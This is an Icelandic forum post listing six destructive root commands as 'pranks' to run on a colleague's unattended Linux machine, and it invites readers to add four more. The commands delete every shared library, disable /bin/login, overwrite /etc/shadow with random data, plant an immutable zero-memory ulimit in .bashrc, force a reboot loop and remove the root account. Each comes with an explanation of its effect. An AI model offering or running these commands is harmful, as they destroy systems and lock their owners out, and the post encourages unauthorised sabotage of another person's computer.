Jæja ..

Áhugamálið hefur verið svo dautt undanfarið að ég áhvað er flippa
smá og gera topp 10 lista yfir hræðilega hluti til að gera við
linux kerfi.

Ég er sjálfur kominn uppí 6 þannig þið, lesendur huga þurfið að
koma með síðustu 4 “hrekkina”, og reynið að vera hugmyndarík :)

-

Ef svo skemmtilega vildi til að þegar þú ert að labba framhjá tölvu
samstarfsfélaga þíns sem sefur hjá konunni þinni og sérð að hann
hefur gleymt að logga sig útúr root skelinni, þá eru hér nokkrar
“sniðugar” uppástungur um skipanir til að kalla fram *evil-grin* :)

Til að þessar skipanir virki eins og skildi þarf að kalla fram
'/sbin/reboot' eftir að einhver af þessum skipunum hefur verið
kölluð fram.

1]
rm -rf ` find / -name ‘*.so*’ ` && ldconfig
- leitar og hendir (search and destroy) öllum shared library's útaf
tölvunni
linux'inn verður frekar ónothæfur :)

2]
chmod 0 /bin/login
- eftur næsta reboot .. gangi þér vel að komast inn :)
þar sem chmod 0 tekur execute flaggið af login :)

3]
cat /dev/urandom > /etc/shadow
- þetta er náttúrulega bara plain nasty
getur ekki loggað þig inn þar sem enginn “notandi” er í shadow
skránni

4]
echo “ulimit -v 0” >> ~/.bashrc && chattr +i ~/.bashrc
- þetta setur virtual memory skeljarinnar (bash) niður í núll og
þar af leiðandi
munu allar skipanir (forrit meðtalin) exita með segament fault
skilaboðum.

5]
echo ‘/sbin/reboot’ >> /etc/rc.d/rc.sysinit
- þetta er meira svona practical joke :)
um leið og init er búið að gera sitt, restartar linux'inn sér :)

6]
grep -v 0:0 /etc/passwd > /tmp/.pwd && mv -f /tmp/.pwd /etc/passwd
- user root does not exist
getur ekki lengur loggað þig inn sem root :)


jæja þá eru 7, 8, 9 og 10 eftir
knock yourselves out :)

- add1
Addi